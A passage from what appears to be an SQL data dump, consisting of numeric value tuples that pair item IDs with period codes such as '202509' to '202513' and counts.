9',2),(5062,1,'202509',2),(5122,1,'202509',2),(5292,1,'202509',2),(5295,1,'202509',2),(5310,1,'202509',2),(5314,1,'202509',2),(5320,1,'202509',2),(5326,1,'202509',2),(5356,1,'202509',2),(76,1,'202509',3),(91,1,'202509',3),(106,1,'202509',3),(335,1,'202509',3),(467,1,'202509',3),(473,1,'202509',3),(476,1,'202509',3),(484,1,'202509',3),(485,1,'202509',3),(1584,1,'202509',3),(1588,1,'202509',3),(1602,1,'202509',3),(1606,1,'202509',3),(1612,1,'202509',3),(1697,1,'202509',3),(1709,1,'202509',3),(1739,1,'202509',3),(1780,1,'202509',3),(2148,1,'202509',3),(2991,1,'202509',3),(2993,1,'202509',3),(3005,1,'202509',3),(3027,1,'202509',3),(3045,1,'202509',3),(3063,1,'202509',3),(3072,1,'202509',3),(3087,1,'202509',3),(3090,1,'202509',3),(3226,1,'202509',3),(3243,1,'202509',3),(3245,1,'202509',3),(3249,1,'202509',3),(3275,1,'202509',3),(3278,1,'202509',3),(3280,1,'202509',3),(3297,1,'202509',3),(3313,1,'202509',3),(3316,1,'202509',3),(3482,1,'202509',3),(3724,1,'202509',3),(3777,1,'202509',3),(4332,1,'202509',3),(4335,1,'202509',3),(4341,1,'202509',3),(4432,1,'202509',3),(4454,1,'202509',3),(4517,1,'202509',3),(4520,1,'202509',3),(4551,1,'202509',3),(4566,1,'202509',3),(4582,1,'202509',3),(4612,1,'202509',3),(4645,1,'202509',3),(4648,1,'202509',3),(4651,1,'202509',3),(4668,1,'202509',3),(4681,1,'202509',3),(4691,1,'202509',3),(4712,1,'202509',3),(4722,1,'202509',3),(4744,1,'202509',3),(4753,1,'202509',3),(4771,1,'202509',3),(4792,1,'202509',3),(4862,1,'202509',3),(4888,1,'202509',3),(4893,1,'202509',3),(4897,1,'202509',3),(4988,1,'202509',3),(5033,1,'202509',3),(5046,1,'202509',3),(5067,1,'202509',3),(5080,1,'202509',3),(5128,1,'202509',3),(5131,1,'202509',3),(5134,1,'202509',3),(5137,1,'202509',3),(5256,1,'202509',3),(5264,1,'202509',3),(5268,1,'202509',3),(5276,1,'202509',3),(5280,1,'202509',3),(5304,1,'202509',3),(5317,1,'202509',3),(5323,1,'202509',3),(5330,1,'202509',3),(5353,1,'202509',3),(74,1,'202509',4),(469,1,'202509',4),(470,1,'202509',4),(474,1,'202509',4),(479,1,'202509',4),(480,1,'202509',4),(481,1,'202509',4),(483,1,'202509',4),(487,1,'202509',4),(488,1,'202509',4),(570,1,'202509',4),(1592,1,'202509',4),(1594,1,'202509',4),(1598,1,'202509',4),(1604,1,'202509',4),(1608,1,'202509',4),(1614,1,'202509',4),(1695,1,'202509',4),(1703,1,'202509',4),(1713,1,'202509',4),(1715,1,'202509',4),(1718,1,'202509',4),(1745,1,'202509',4),(1770,1,'202509',4),(2154,1,'202509',4),(2165,1,'202509',4),(2309,1,'202509',4),(2457,1,'202509',4),(2503,1,'202509',4),(2775,1,'202509',4),(2904,1,'202509',4),(2956,1,'202509',4),(2964,1,'202509',4),(2965,1,'202509',4),(2989,1,'202509',4),(3030,1,'202509',4),(3069,1,'202509',4),(3096,1,'202509',4),(3240,1,'202509',4),(3261,1,'202509',4),(3271,1,'202509',4),(3273,1,'202509',4),(3285,1,'202509',4),(3307,1,'202509',4),(3430,1,'202509',4),(3714,1,'202509',4),(3731,1,'202509',4),(3735,1,'202509',4),(3742,1,'202509',4),(3746,1,'202509',4),(4357,1,'202509',4),(4373,1,'202509',4),(4382,1,'202509',4),(4396,1,'202509',4),(4412,1,'202509',4),(4420,1,'202509',4),(4444,1,'202509',4),(4514,1,'202509',4),(4529,1,'202509',4),(4556,1,'202509',4),(4608,1,'202509',4),(4660,1,'202509',4),(4674,1,'202509',4),(4703,1,'202509',4),(4706,1,'202509',4),(4759,1,'202509',4),(4765,1,'202509',4),(4776,1,'202509',4),(5020,1,'202509',4),(5042,1,'202509',4),(5050,1,'202509',4),(5101,1,'202509',4),(5125,1,'202509',4),(5140,1,'202509',4),(5146,1,'202509',4),(5153,1,'202509',4),(5248,1,'202509',4),(5259,1,'202509',4),(5271,1,'202509',4),(5298,1,'202509',4),(5359,1,'202509',4),(84,1,'202509',5),(102,1,'202509',5),(472,1,'202509',5),(478,1,'202509',5),(1596,1,'202509',5),(1600,1,'202509',5),(1707,1,'202509',5),(1722,1,'202509',5),(1728,1,'202509',5),(1732,1,'202509',5),(1751,1,'202509',5),(1776,1,'202509',5),(2161,1,'202509',5),(2658,1,'202509',5),(2813,1,'202509',5),(2911,1,'202509',5),(3023,1,'202509',5),(3034,1,'202509',5),(3097,1,'202509',5),(3107,1,'202509',5),(3710,1,'202509',5),(3764,1,'202509',5),(4238,1,'202509',5),(4391,1,'202509',5),(4428,1,'202509',5),(4542,1,'202509',5),(4741,1,'202509',5),(4747,1,'202509',5),(4768,1,'202509',5),(5054,1,'202509',5),(5289,1,'202509',5),(5301,1,'202509',5),(5307,1,'202509',5),(5334,1,'202509',5),(471,1,'202509',6),(1701,1,'202509',6),(1726,1,'202509',6),(1749,1,'202509',6),(1772,1,'202509',6),(1774,1,'202509',6),(2609,1,'202509',6),(2617,1,'202509',6),(2751,1,'202509',6),(3041,1,'202509',6),(3066,1,'202509',6),(3079,1,'202509',6),(3102,1,'202509',6),(3117,1,'202509',6),(3265,1,'202509',6),(3282,1,'202509',6),(3287,1,'202509',6),(3290,1,'202509',6),(3489,1,'202509',6),(4363,1,'202509',6),(4404,1,'202509',6),(4866,1,'202509',6),(4996,1,'202509',6),(5024,1,'202509',6),(5071,1,'202509',6),(5076,1,'202509',6),(5157,1,'202509',6),(5163,1,'202509',6),(1724,1,'202509',7),(2801,1,'202509',7),(3038,1,'202509',7),(3124,1,'202509',7),(4408,1,'202509',7),(1711,1,'202509',8),(1734,1,'202509',8),(2769,1,'202509',8),(468,1,'202509',9),(4976,1,'202509',9),(5253,1,'202509',9),(89,1,'202509',10),(1766,1,'202509',10),(72,1,'202509',12),(3247,1,'202509',13),(1586,1,'202509',14),(3781,1,'202509',21),(3060,1,'202509',22),(80,1,'202509',32),(68,1,'202509',36),(9,1,'202509',28263),(468,1,'202510',1),(474,1,'202510',1),(477,1,'202510',1),(478,1,'202510',1),(481,1,'202510',1),(483,1,'202510',1),(486,1,'202510',1),(1590,1,'202510',1),(1594,1,'202510',1),(1610,1,'202510',1),(1703,1,'202510',1),(1709,1,'202510',1),(1722,1,'202510',1),(1726,1,'202510',1),(1732,1,'202510',1),(1774,1,'202510',1),(2148,1,'202510',1),(2159,1,'202510',1),(2248,1,'202510',1),(2558,1,'202510',1),(2704,1,'202510',1),(2804,1,'202510',1),(2956,1,'202510',1),(3005,1,'202510',1),(3023,1,'202510',1),(3045,1,'202510',1),(3087,1,'202510',1),(3097,1,'202510',1),(3102,1,'202510',1),(3104,1,'202510',1),(3107,1,'202510',1),(3263,1,'202510',1),(3265,1,'202510',1),(3273,1,'202510',1),(3278,1,'202510',1),(3287,1,'202510',1),(3290,1,'202510',1),(3307,1,'202510',1),(3313,1,'202510',1),(3531,1,'202510',1),(3534,1,'202510',1),(3752,1,'202510',1),(3771,1,'202510',1),(4323,1,'202510',1),(4357,1,'202510',1),(4377,1,'202510',1),(4382,1,'202510',1),(4391,1,'202510',1),(4400,1,'202510',1),(4408,1,'202510',1),(4424,1,'202510',1),(4428,1,'202510',1),(4436,1,'202510',1),(4440,1,'202510',1),(4444,1,'202510',1),(4524,1,'202510',1),(4542,1,'202510',1),(4551,1,'202510',1),(4566,1,'202510',1),(4582,1,'202510',1),(4587,1,'202510',1),(4591,1,'202510',1),(4608,1,'202510',1),(4612,1,'202510',1),(4645,1,'202510',1),(4657,1,'202510',1),(4685,1,'202510',1),(4691,1,'202510',1),(4741,1,'202510',1),(4762,1,'202510',1),(4771,1,'202510',1),(4792,1,'202510',1),(4797,1,'202510',1),(4893,1,'202510',1),(4977,1,'202510',1),(4988,1,'202510',1),(5020,1,'202510',1),(5024,1,'202510',1),(5033,1,'202510',1),(5050,1,'202510',1),(5067,1,'202510',1),(5071,1,'202510',1),(5080,1,'202510',1),(5125,1,'202510',1),(5134,1,'202510',1),(5140,1,'202510',1),(5163,1,'202510',1),(5253,1,'202510',1),(5280,1,'202510',1),(5289,1,'202510',1),(5307,1,'202510',1),(5310,1,'202510',1),(5314,1,'202510',1),(76,1,'202510',2),(87,1,'202510',2),(89,1,'202510',2),(335,1,'202510',2),(471,1,'202510',2),(484,1,'202510',2),(1596,1,'202510',2),(1604,1,'202510',2),(1612,1,'202510',2),(1701,1,'202510',2),(1718,1,'202510',2),(1720,1,'202510',2),(1728,1,'202510',2),(1730,1,'202510',2),(1737,1,'202510',2),(1766,1,'202510',2),(1782,1,'202510',2),(2150,1,'202510',2),(2293,1,'202510',2),(2658,1,'202510',2),(2769,1,'202510',2),(2775,1,'202510',2),(2904,1,'202510',2),(2965,1,'202510',2),(2989,1,'202510',2),(3006,1,'202510',2),(3027,1,'202510',2),(3066,1,'202510',2),(3069,1,'202510',2),(3079,1,'202510',2),(3090,1,'202510',2),(3109,1,'202510',2),(3127,1,'202510',2),(3245,1,'202510',2),(3257,1,'202510',2),(3259,1,'202510',2),(3261,1,'202510',2),(3271,1,'202510',2),(3282,1,'202510',2),(3486,1,'202510',2),(3710,1,'202510',2),(3731,1,'202510',2),(4301,1,'202510',2),(4329,1,'202510',2),(4387,1,'202510',2),(4412,1,'202510',2),(4432,1,'202510',2),(4556,1,'202510',2),(4648,1,'202510',2),(4712,1,'202510',2),(4722,1,'202510',2),(5028,1,'202510',2),(5046,1,'202510',2),(5137,1,'202510',2),(5259,1,'202510',2),(5292,1,'202510',2),(5317,1,'202510',2),(5356,1,'202510',2),(110,1,'202510',3),(487,1,'202510',3),(1544,1,'202510',3),(1584,1,'202510',3),(1598,1,'202510',3),(1695,1,'202510',3),(1749,1,'202510',3),(1768,1,'202510',3),(1778,1,'202510',3),(2154,1,'202510',3),(2161,1,'202510',3),(2457,1,'202510',3),(2991,1,'202510',3),(3092,1,'202510',3),(3096,1,'202510',3),(3253,1,'202510',3),(4368,1,'202510',3),(4416,1,'202510',3),(4420,1,'202510',3),(4448,1,'202510',3),(4756,1,'202510',3),(4759,1,'202510',3),(4866,1,'202510',3),(4996,1,'202510',3),(5101,1,'202510',3),(5301,1,'202510',3),(72,1,'202510',4),(482,1,'202510',4),(485,1,'202510',4),(570,1,'202510',4),(1588,1,'202510',4),(1602,1,'202510',4),(1699,1,'202510',4),(1711,1,'202510',4),(1724,1,'202510',4),(1743,1,'202510',4),(1770,1,'202510',4),(2801,1,'202510',4),(2809,1,'202510',4),(3041,1,'202510',4),(3117,1,'202510',4),(4668,1,'202510',4),(4776,1,'202510',4),(84,1,'202510',5),(2165,1,'202510',5),(2178,1,'202510',5),(2297,1,'202510',5),(2309,1,'202510',5),(3004,1,'202510',5),(5037,1,'202510',5),(5122,1,'202510',5),(1614,1,'202510',6),(1772,1,'202510',6),(3247,1,'202510',6),(3251,1,'202510',6),(4529,1,'202510',6),(5076,1,'202510',6),(2751,1,'202510',7),(4363,1,'202510',7),(473,1,'202510',8),(1582,1,'202510',8),(1606,1,'202510',8),(1600,1,'202510',9),(2813,1,'202510',10),(3060,1,'202510',11),(1586,1,'202510',12),(1608,1,'202510',13),(3781,1,'202510',13),(68,1,'202510',34),(80,1,'202510',35),(9,1,'202510',30416),(102,1,'202511',1),(469,1,'202511',1),(477,1,'202511',1),(479,1,'202511',1),(482,1,'202511',1),(483,1,'202511',1),(1594,1,'202511',1),(1608,1,'202511',1),(1610,1,'202511',1),(1695,1,'202511',1),(1699,1,'202511',1),(1709,1,'202511',1),(1718,1,'202511',1),(1726,1,'202511',1),(1728,1,'202511',1),(1734,1,'202511',1),(1737,1,'202511',1),(1741,1,'202511',1),(2148,1,'202511',1),(2161,1,'202511',1),(2296,1,'202511',1),(2964,1,'202511',1),(3038,1,'202511',1),(3069,1,'202511',1),(3083,1,'202511',1),(3087,1,'202511',1),(3245,1,'202511',1),(3249,1,'202511',1),(3714,1,'202511',1),(4301,1,'202511',1),(4377,1,'202511',1),(4400,1,'202511',1),(4424,1,'202511',1),(4428,1,'202511',1),(4448,1,'202511',1),(4529,1,'202511',1),(4546,1,'202511',1),(4556,1,'202511',1),(4608,1,'202511',1),(4612,1,'202511',1),(4654,1,'202511',1),(4657,1,'202511',1),(4660,1,'202511',1),(4697,1,'202511',1),(4747,1,'202511',1),(4771,1,'202511',1),(4792,1,'202511',1),(4883,1,'202511',1),(4930,1,'202511',1),(4977,1,'202511',1),(4980,1,'202511',1),(4983,1,'202511',1),(5024,1,'202511',1),(5033,1,'202511',1),(5058,1,'202511',1),(5062,1,'202511',1),(5122,1,'202511',1),(5163,1,'202511',1),(5256,1,'202511',1),(5289,1,'202511',1),(5307,1,'202511',1),(5310,1,'202511',1),(5314,1,'202511',1),(5320,1,'202511',1),(5326,1,'202511',1),(5359,1,'202511',1),(5363,1,'202511',1),(5378,1,'202511',1),(5383,1,'202511',1),(74,1,'202511',2),(76,1,'202511',2),(84,1,'202511',2),(467,1,'202511',2),(471,1,'202511',2),(480,1,'202511',2),(485,1,'202511',2),(1590,1,'202511',2),(1604,1,'202511',2),(1612,1,'202511',2),(1715,1,'202511',2),(1743,1,'202511',2),(1770,1,'202511',2),(1780,1,'202511',2),(2154,1,'202511',2),(2248,1,'202511',2),(2748,1,'202511',2),(2769,1,'202511',2),(3107,1,'202511',2),(3226,1,'202511',2),(3251,1,'202511',2),(3253,1,'202511',2),(3257,1,'202511',2),(3273,1,'202511',2),(3285,1,'202511',2),(3489,1,'202511',2),(3764,1,'202511',2),(4363,1,'202511',2),(4457,1,'202511',2),(4741,1,'202511',2),(4862,1,'202511',2),(4866,1,'202511',2),(4988,1,'202511',2),(5054,1,'202511',2),(5067,1,'202511',2),(5140,1,'202511',2),(5146,1,'202511',2),(5248,1,'202511',2),(5280,1,'202511',2),(5374,1,'202511',2),(487,1,'202511',3),(1598,1,'202511',3),(1778,1,'202511',3),(2297,1,'202511',3),(2704,1,'202511',3),(3030,1,'202511',3),(3090,1,'202511',3),(3092,1,'202511',3),(3124,1,'202511',3),(3316,1,'202511',3),(5298,1,'202511',3),(5317,1,'202511',3),(106,1,'202511',4),(110,1,'202511',4),(470,1,'202511',4),(488,1,'202511',4),(570,1,'202511',4),(1582,1,'202511',4),(1722,1,'202511',4),(1745,1,'202511',4),(1749,1,'202511',4),(1782,1,'202511',4),(2156,1,'202511',4),(2165,1,'202511',4),(2178,1,'202511',4),(2457,1,'202511',4),(2809,1,'202511',4),(2904,1,'202511',4),(3027,1,'202511',4),(3045,1,'202511',4),(3063,1,'202511',4),(3096,1,'202511',4),(3247,1,'202511',4),(3261,1,'202511',4),(3263,1,'202511',4),(3267,1,'202511',4),(3278,1,'202511',4),(3280,1,'202511',4),(3290,1,'202511',4),(3710,1,'202511',4),(3746,1,'202511',4),(3752,1,'202511',4),(4420,1,'202511',4),(4454,1,'202511',4),(4582,1,'202511',4),(4668,1,'202511',4),(4674,1,'202511',4),(4688,1,'202511',4),(4744,1,'202511',4),(4762,1,'202511',4),(5020,1,'202511',4),(5028,1,'202511',4),(5101,1,'202511',4),(5128,1,'202511',4),(5131,1,'202511',4),(5295,1,'202511',4),(335,1,'202511',5),(472,1,'202511',5),(474,1,'202511',5),(1588,1,'202511',5),(1592,1,'202511',5),(1600,1,'202511',5),(1614,1,'202511',5),(1705,1,'202511',5),(1772,1,'202511',5),(2159,1,'202511',5),(2911,1,'202511',5),(3066,1,'202511',5),(3117,1,'202511',5),(3287,1,'202511',5),(3531,1,'202511',5),(3742,1,'202511',5),(4329,1,'202511',5),(4335,1,'202511',5),(4368,1,'202511',5),(4387,1,'202511',5),(4396,1,'202511',5),(4551,1,'202511',5),(4648,1,'202511',5),(4694,1,'202511',5),(4750,1,'202511',5),(4753,1,'202511',5),(5037,1,'202511',5),(5071,1,'202511',5),(5080,1,'202511',5),(5264,1,'202511',5),(5268,1,'202511',5),(5323,1,'202511',5),(5330,1,'202511',5),(108,1,'202511',6),(484,1,'202511',6),(1584,1,'202511',6),(1701,1,'202511',6),(1747,1,'202511',6),(2152,1,'202511',6),(2252,1,'202511',6),(2558,1,'202511',6),(2617,1,'202511',6),(2658,1,'202511',6),(2801,1,'202511',6),(2956,1,'202511',6),(3034,1,'202511',6),(3072,1,'202511',6),(3229,1,'202511',6),(3243,1,'202511',6),(3269,1,'202511',6),(3313,1,'202511',6),(3438,1,'202511',6),(3482,1,'202511',6),(3541,1,'202511',6),(4341,1,'202511',6),(4404,1,'202511',6),(4412,1,'202511',6),(4416,1,'202511',6),(4517,1,'202511',6),(4709,1,'202511',6),(4712,1,'202511',6),(4759,1,'202511',6),(5134,1,'202511',6),(5271,1,'202511',6),(5304,1,'202511',6),(5353,1,'202511',6),(87,1,'202511',7),(91,1,'202511',7),(478,1,'202511',7),(481,1,'202511',7),(486,1,'202511',7),(1596,1,'202511',7),(1606,1,'202511',7),(1724,1,'202511',7),(1730,1,'202511',7),(1739,1,'202511',7),(1751,1,'202511',7),(2609,1,'202511',7),(3006,1,'202511',7),(3023,1,'202511',7),(3097,1,'202511',7),(3265,1,'202511',7),(4382,1,'202511',7),(4408,1,'202511',7),(4432,1,'202511',7),(4645,1,'202511',7),(4663,1,'202511',7),(4681,1,'202511',7),(4976,1,'202511',7),(4996,1,'202511',7),(5153,1,'202511',7),(5259,1,'202511',7),(5334,1,'202511',7),(89,1,'202511',8),(473,1,'202511',8),(1711,1,'202511',8),(1774,1,'202511',8),(2503,1,'202511',8),(2989,1,'202511',8),(3275,1,'202511',8),(4323,1,'202511',8),(5157,1,'202511',8),(3005,1,'202511',9),(3041,1,'202511',9),(3060,1,'202511',9),(3079,1,'202511',9),(4768,1,'202511',9),(4776,1,'202511',9),(468,1,'202511',10),(1544,1,'202511',10),(1713,1,'202511',10),(1766,1,'202511',10),(2813,1,'202511',10),(3498,1,'202511',10),(5076,1,'202511',10),(5292,1,'202511',10),(3240,1,'202511',11),(476,1,'202511',12),(2309,1,'202511',12),(2751,1,'202511',12),(4802,1,'202511',12),(1602,1,'202511',13),(1586,1,'202511',14),(3781,1,'202511',16),(72,1,'202511',23),(80,1,'202511',32),(68,1,'202511',41),(9,1,'202511',35428),(76,1,'202512',1),(102,1,'202512',1),(477,1,'202512',1),(482,1,'202512',1),(485,1,'202512',1),(1590,1,'202512',1),(1695,1,'202512',1),(1715,1,'202512',1),(1720,1,'202512',1),(1732,1,'202512',1),(1770,1,'202512',1),(2154,1,'202512',1),(2248,1,'202512',1),(2296,1,'202512',1),(2769,1,'202512',1),(2804,1,'202512',1),(2964,1,'202512',1),(2965,1,'202512',1),(2991,1,'202512',1),(2993,1,'202512',1),(3027,1,'202512',1),(3069,1,'202512',1),(3079,1,'202512',1),(3109,1,'202512',1),(3249,1,'202512',1),(3251,1,'202512',1),(3271,1,'202512',1),(3285,1,'202512',1),(3486,1,'202512',1),(3531,1,'202512',1),(3534,1,'202512',1),(3714,1,'202512',1),(3724,1,'202512',1),(3731,1,'202512',1),(3735,1,'202512',1),(3738,1,'202512',1),(3777,1,'202512',1),(4275,1,'202512',1),(4323,1,'202512',1),(4332,1,'202512',1),(4363,1,'202512',1),(4428,1,'202512',1),(4448,1,'202512',1),(4457,1,'202512',1),(4514,1,'202512',1),(4520,1,'202512',1),(4529,1,'202512',1),(4556,1,'202512',1),(4566,1,'202512',1),(4591,1,'202512',1),(4657,1,'202512',1),(4674,1,'202512',1),(4677,1,'202512',1),(4691,1,'202512',1),(4697,1,'202512',1),(4722,1,'202512',1),(4870,1,'202512',1),(4883,1,'202512',1),(4888,1,'202512',1),(4893,1,'202512',1),(4977,1,'202512',1),(4980,1,'202512',1),(5046,1,'202512',1),(5058,1,'202512',1),(5067,1,'202512',1),(5125,1,'202512',1),(5137,1,'202512',1),(5280,1,'202512',1),(5289,1,'202512',1),(5298,1,'202512',1),(5301,1,'202512',1),(84,1,'202512',2),(91,1,'202512',2),(110,1,'202512',2),(484,1,'202512',2),(486,1,'202512',2),(488,1,'202512',2),(1596,1,'202512',2),(1598,1,'202512',2),(1604,1,'202512',2),(1606,1,'202512',2),(1610,1,'202512',2),(1612,1,'202512',2),(1701,1,'202512',2),(1711,1,'202512',2),(1713,1,'202512',2),(1718,1,'202512',2),(1722,1,'202512',2),(1734,1,'202512',2),(1737,1,'202512',2),(1739,1,'202512',2),(1743,1,'202512',2),(1745,1,'202512',2),(1751,1,'202512',2),(1772,1,'202512',2),(1774,1,'202512',2),(1778,1,'202512',2),(2152,1,'202512',2),(2165,1,'202512',2),(2293,1,'202512',2),(2297,1,'202512',2),(2503,1,'202512',2),(2558,1,'202512',2),(2617,1,'202512',2),(2658,1,'202512',2),(2911,1,'202512',2),(2956,1,'202512',2),(2989,1,'202512',2),(3004,1,'202512',2),(3006,1,'202512',2),(3030,1,'202512',2),(3038,1,'202512',2),(3041,1,'202512',2),(3045,1,'202512',2),(3072,1,'202512',2),(3096,1,'202512',2),(3104,1,'202512',2),(3117,1,'202512',2),(3226,1,'202512',2),(3243,1,'202512',2),(3265,1,'202512',2),(3269,1,'202512',2),(3273,1,'202512',2),(3275,1,'202512',2),(3278,1,'202512',2),(3307,1,'202512',2),(3313,1,'202512',2),(3316,1,'202512',2),(3479,1,'202512',2),(3482,1,'202512',2),(3489,1,'202512',2),(3742,1,'202512',2),(3746,1,'202512',2),(4301,1,'202512',2),(4368,1,'202512',2),(4382,1,'202512',2),(4387,1,'202512',2),(4391,1,'202512',2),(4404,1,'202512',2),(4412,1,'202512',2),(4436,1,'202512',2),(4454,1,'202512',2),(4517,1,'202512',2),(4524,1,'202512',2),(4542,1,'202512',2),(4582,1,'202512',2),(4608,1,'202512',2),(4645,1,'202512',2),(4651,1,'202512',2),(4663,1,'202512',2),(4681,1,'202512',2),(4712,1,'202512',2),(4744,1,'202512',2),(4753,1,'202512',2),(4762,1,'202512',2),(4768,1,'202512',2),(4802,1,'202512',2),(4897,1,'202512',2),(4988,1,'202512',2),(5020,1,'202512',2),(5042,1,'202512',2),(5134,1,'202512',2),(5153,1,'202512',2),(5163,1,'202512',2),(5256,1,'202512',2),(5259,1,'202512',2),(5276,1,'202512',2),(5317,1,'202512',2),(5323,1,'202512',2),(5359,1,'202512',2),(108,1,'202512',3),(467,1,'202512',3),(470,1,'202512',3),(471,1,'202512',3),(473,1,'202512',3),(481,1,'202512',3),(1582,1,'202512',3),(1586,1,'202512',3),(1592,1,'202512',3),(1608,1,'202512',3),(1614,1,'202512',3),(1703,1,'202512',3),(1709,1,'202512',3),(1768,1,'202512',3),(2148,1,'202512',3),(2150,1,'202512',3),(2161,1,'202512',3),(2178,1,'202512',3),(2813,1,'202512',3),(2904,1,'202512',3),(3005,1,'202512',3),(3034,1,'202512',3),(3063,1,'202512',3),(3083,1,'202512',3),(3253,1,'202512',3),(3263,1,'202512',3),(3280,1,'202512',3),(3290,1,'202512',3),(3438,1,'202512',3),(3498,1,'202512',3),(3764,1,'202512',3),(4335,1,'202512',3),(4396,1,'202512',3),(4416,1,'202512',3),(4432,1,'202512',3),(4668,1,'202512',3),(4688,1,'202512',3),(4694,1,'202512',3),(4709,1,'202512',3),(4750,1,'202512',3),(4759,1,'202512',3),(4776,1,'202512',3),(4976,1,'202512',3),(5037,1,'202512',3),(5071,1,'202512',3),(5080,1,'202512',3),(5101,1,'202512',3),(5131,1,'202512',3),(5157,1,'202512',3),(5271,1,'202512',3),(5295,1,'202512',3),(5304,1,'202512',3),(5330,1,'202512',3),(5334,1,'202512',3),(5353,1,'202512',3),(472,1,'202512',4),(474,1,'202512',4),(570,1,'202512',4),(1544,1,'202512',4),(1584,1,'202512',4),(1602,1,'202512',4),(1699,1,'202512',4),(1705,1,'202512',4),(1730,1,'202512',4),(1747,1,'202512',4),(1749,1,'202512',4),(1766,1,'202512',4),(2156,1,'202512',4),(2252,1,'202512',4),(2309,1,'202512',4),(2751,1,'202512',4),(2809,1,'202512',4),(3087,1,'202512',4),(3090,1,'202512',4),(3124,1,'202512',4),(3229,1,'202512',4),(3247,1,'202512',4),(3261,1,'202512',4),(3267,1,'202512',4),(3287,1,'202512',4),(3541,1,'202512',4),(3710,1,'202512',4),(4329,1,'202512',4),(4408,1,'202512',4),(4420,1,'202512',4),(4551,1,'202512',4),(4648,1,'202512',4),(4996,1,'202512',4),(5140,1,'202512',4),(5264,1,'202512',4),(89,1,'202512',5),(478,1,'202512',5),(1600,1,'202512',5),(1724,1,'202512',5),(2159,1,'202512',5),(2704,1,'202512',5),(2801,1,'202512',5),(3023,1,'202512',5),(3060,1,'202512',5),(3066,1,'202512',5),(3092,1,'202512',5),(3097,1,'202512',5),(3240,1,'202512',5),(5028,1,'202512',5),(5076,1,'202512',5),(5128,1,'202512',5),(468,1,'202512',6),(1588,1,'202512',6),(335,1,'202512',7),(5292,1,'202512',8),(72,1,'202512',10),(2609,1,'202512',10),(3781,1,'202512',14),(68,1,'202512',26),(80,1,'202512',32),(9,1,'202512',25829),(467,1,'202513',1),(482,1,'202513',1),(483,1,'202513',1),(1699,1,'202513',1),(1715,1,'202513',1),(1737,1,'202513',1),(1770,1,'202513',1),(1776,1,'202513',1),(1780,1,'202513',1),(2165,1,'202513',1),(2904,1,'202513',1),(2993,1,'202513',1),(3030,1,'202513',1),(3038,1,'202513',1),(3104,1,'202513',1),(3127,1,'202513',1),(3251,1,'202513',1),(3257,1,'202513',1),(3316,1,'202513',1),(3724,1,'202513',1),(3727,1,'202513',1),(3731,1,'202513',1),(3735,1,'202513',1),(3771,1,'202513',1),(3774,1,'202513',1),(4357,1,'202513',1),(4400,1,'202513',1),(4420,1,'202513',1),(4444,1,'202513',1),(4542,1,'202513',1),(4651,1,'202513',1),(4654,1,'202513',1),(4677,1,'202513',1),(4697,1,'202513',1),(4870,1,'202513',1),(4893,1,'202513',1),(5058,1,'202513',1),(5067,1,'202513',1),(5125,1,'202513',1),(5163,1,'202513',1),(5280,1,'202513',1),(5298,1,'202513',1),(5301,1,'202513',1),(5307,1,'202513',1),(5359,1,'202513',1),(5374,1,'202513',1),(5378,1,'202513',1),(74,1,'202513',2),(76,1,'202513',2),(84,1,'202513',2),(470,1,'202513',2),(477,1,'202513',2),(485,1,'202513',2),(487,1,'202513',2),(1703,1,'202513',2),(1709,1,'202513',2),(1720,1,'202513',2),(1768,1,'202513',2),(2154,1,'202513',2),(2161,1,'202513',2),(2293,1,'202513',2),(2296,1,'202513',2),(2457,1,'202513',2),(2964,1,'202513',2),(2991,1,'202513',2),(3004,1,'202513',2),(3087,1,'202513',2),(3090,1,'202513',2),(3092,1,'202513',2),(3226,1,'202513',2),(3245,1,'202513',2),(3259,1,'202513',2),(3271,1,'202513',2),(3273,1,'202513',2),(3307,1,'202513',2),(3534,1,'202513',2),(3764,1,'202513',2),(4332,1,'202513',2),(4338,1,'202513',2),(4391,1,'202513',2),(4514,1,'202513',2),(4524,1,'202513',2),(4792,1,'202513',2),(4866,1,'202513',2),(5042,1,'202513',2),(1594,1,'202513',3),(1608,1,'202513',3),(1612,1,'202513',3),(1697,1,'202513',3),(1707,1,'202513',3),(1726,1,'202513',3),(1728,1,'202513',3),(1743,1,'202513',3),(2248,1,'202513',3),(2704,1,'202513',3),(3083,1,'202513',3),(3282,1,'202513',3),(4457,1,'202513',3),(4691,1,'202513',3),(5024,1,'202513',3),(87,1,'202513',4),(110,1,'202513',4),(476,1,'202513',4),(1592,1,'202513',4),(1596,1,'202513',4),(1711,1,'202513',4),(1713,1,'202513',4),(1730,1,'202513',4),(1732,1,'202513',4),(1739,1,'202513',4),(1745,1,'202513',4),(1747,1,'202513',4),(1749,1,'202513',4),(1751,1,'202513',4),(1766,1,'202513',4),(1778,1,'202513',4),(1782,1,'202513',4),(2658,1,'202513',4),(2769,1,'202513',4),(2801,1,'202513',4),(2989,1,'202513',4),(3006,1,'202513',4),(3034,1,'202513',4),(3096,1,'202513',4),(3097,1,'202513',4),(3229,1,'202513',4),(3240,1,'202513',4),(3243,1,'202513',4),(3253,1,'202513',4),(3267,1,'202513',4),(3269,1,'202513',4),(3275,1,'202513',4),(3287,1,'202513',4),(3438,1,'202513',4),(3482,1,'202513',4),(3498,1,'202513',4),(3531,1,'202513',4),(3541,1,'202513',4),(3710,1,'202513',4),(3742,1,'202513',4),(4323,1,'202513',4),(4329,1,'202513',4),(4335,1,'202513',4),(4382,1,'202513',4),(4387,1,'202513',4),(4404,1,'202513',4),(4582,1,'202513',4),(4648,1,'202513',4),(4663,1,'202513',4),(4681,1,'202513',4),(4688,1,'202513',4),(4744,1,'202513',4),(4750,1,'202513',4),(4753,1,'202513',4),(4802,1,'202513',4),(4988,1,'202513',4),(4996,1,'202513',4),(5020,1,'202513',4),(5071,1,'202513',4),(5080,1,'202513',4),(5131,1,'202513',4),(5153,1,'202513',4),(5264,1,'202513',4),(5295,1,'202513',4),(5304,1,'202513',4),(5323,1,'202513',4),(5353,1,'202513',4),(89,1,'202513',5),(91,1,'202513',5),(106,1,'202513',5),(108,1,'202513',5),(468,1,'202513',5),(473,1,'202513',5),(478,1,'202513',5),(484,1,'202513',5),(570,1,'202513',5),(1544,1,'202513',5),(1588,1,'202513',5),(1600,1,'202513',5),(1701,1,'202513',5),(1705,1,'202513',5),(1724,1,'202513',5),(1774,1,'202513',5),(2156,1,'202513',5),(2159,1,'202513',5),(2309,1,'202513',5),(2558,1,'202513',5),(2617,1,'202513',5),(2809,1,'202513',5),(2956,1,'202513',5),(3023,1,'202513',5),(3066,1,'202513',5),(3072,1,'202513',5),(3117,1,'202513',5),(3261,1,'202513',5),(3263,1,'202513',5),(3265,1,'202513',5),(3280,1,'202513',5),(3290,1,'202513',5),(3313,1,'202513',5),(4